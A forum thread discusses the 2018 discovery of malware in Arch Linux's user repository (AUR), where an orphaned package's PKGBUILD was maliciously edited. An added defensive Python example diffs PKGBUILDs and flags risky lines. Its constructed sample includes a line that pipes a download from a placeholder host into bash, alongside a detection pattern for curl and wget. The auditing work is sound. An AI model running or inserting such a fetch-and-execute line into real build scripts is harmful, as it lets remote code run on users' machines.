Arch Linux AUR Repository Found to Contain Malware
I attempted to post this in the Linux News section but it appears that it was not approved for posting....
"The Arch Linux user-maintained software repository called AUR has been found to host malware. The discovery was made after a change in one of the package installation instructions was made. This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories..." https://sensorstechforum.com/arch-li...ntain-malware/ https://www.bleepingcomputer.com/new...ge-repository/ https://betanews.com/2018/07/11/arch-linux-malware/ https://www.linuxuprising.com/2018/0...epository.html
I'm an Arch user and I have to say that my level of surprise is...none.
Long-time Arch user, and I'm very surprised it didn't make the news on the front page. Seems unless you are subscribed to the AUR-specific mailing lists you don't need to know.
Bloody strange attitude IMHO. I don't use AUR much, but it looks like damn near everyone uses one of the helper tools. Myself excluded of course.
this is FUD, or maybe just trying to blow up what is essentially not news at all.
...or, as ChuangTzu quoted correctly: This is yet another incident that showcases that Linux users should not explicitly trust user-controlled repositories...
WHY spreading FUD??? nonsense!
what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.
if you know what the AUR is and how it works, this is really no surprise at all. one is not supposed to trust these packages explicitly. i usually go by votes & popularity & comments. if something is off, people notice very quickly (comments) and take appropriate action (thanks to archlinux' concept of Trusted Users this is possible). Btw, all this was fixed 1-3 days BEFORE these articles even came out. PS: of the four links in post #1 i found this one most informative. it's all there if one cares to read beyond a few buzzwords. PPS: my original assessment that it's the acroread program itself that is the malware, was wrong. once again, read the article.
https://distrowatch.com/dwres.php?re...ine&story=6389
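The post above describes the actual risk: an AUR package is a PKGBUILD script that anyone who adopts the package can edit, so the defence is to read (or at least diff) the PKGBUILD before letting a helper build it. The following added example (not code from the thread or from Arch) shows one way to do that review mechanically: it diffs the current PKGBUILD against the copy you last reviewed and flags network fetches inside build/package functions and skipped checksums. Both PKGBUILD texts are constructed samples, and the hostnames in them are placeholders.

```python
"""Review an AUR PKGBUILD before building it (added example, not project code)."""
import re
import difflib

# Constructed sample: the PKGBUILD as it looked when you last reviewed it.
REVIEWED = """\
pkgname=examplepkg
pkgver=1.0
source=("https://example.org/examplepkg-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 examplepkg "$pkgdir/usr/bin/examplepkg"
}
"""

# Constructed sample: the same package after a hostile maintainer edit.
CURRENT = """\
pkgname=examplepkg
pkgver=1.0
source=("https://example.org/examplepkg-1.0.tar.gz")
sha256sums=('SKIP')
package() {
  install -Dm755 examplepkg "$pkgdir/usr/bin/examplepkg"
  curl -s https://paste.example.invalid/x | bash
}
"""

# Commands that pull content from the network at build time, bypassing the
# checksummed source=() array that makepkg verifies.
FETCH_RE = re.compile(r'\b(curl|wget|git\s+clone|pip\s+install)\b')

def audit_pkgbuild(text):
    """Return (line number, reason) for every suspicious line in a PKGBUILD."""
    findings, in_func = [], False
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if re.match(r'^\w+\s*\(\)\s*\{', stripped):      # e.g. package() {
            in_func = True
        elif stripped == '}':
            in_func = False
        elif in_func and not stripped.startswith('#') and FETCH_RE.search(stripped):
            findings.append((n, 'network fetch inside build/package function'))
        if re.match(r'^(md5|sha\d+|b2)sums=', stripped) and 'SKIP' in stripped:
            findings.append((n, 'checksum verification skipped'))
    return findings

def changed_lines(reviewed, current):
    """Only the added/removed lines between the reviewed and current PKGBUILD."""
    diff = difflib.unified_diff(reviewed.splitlines(), current.splitlines(),
                                'reviewed', 'current', lineterm='', n=0)
    return [l for l in diff if l[:1] in '+-' and not l.startswith(('+++', '---'))]

if __name__ == '__main__':
    for n, why in audit_pkgbuild(CURRENT):
        print(f'line {n}: {why}')
    print('\n'.join(changed_lines(REVIEWED, CURRENT)))
```

In practice you would keep the reviewed copy of each package's PKGBUILD and refuse to build when `changed_lines` is non-empty until the diff has been read.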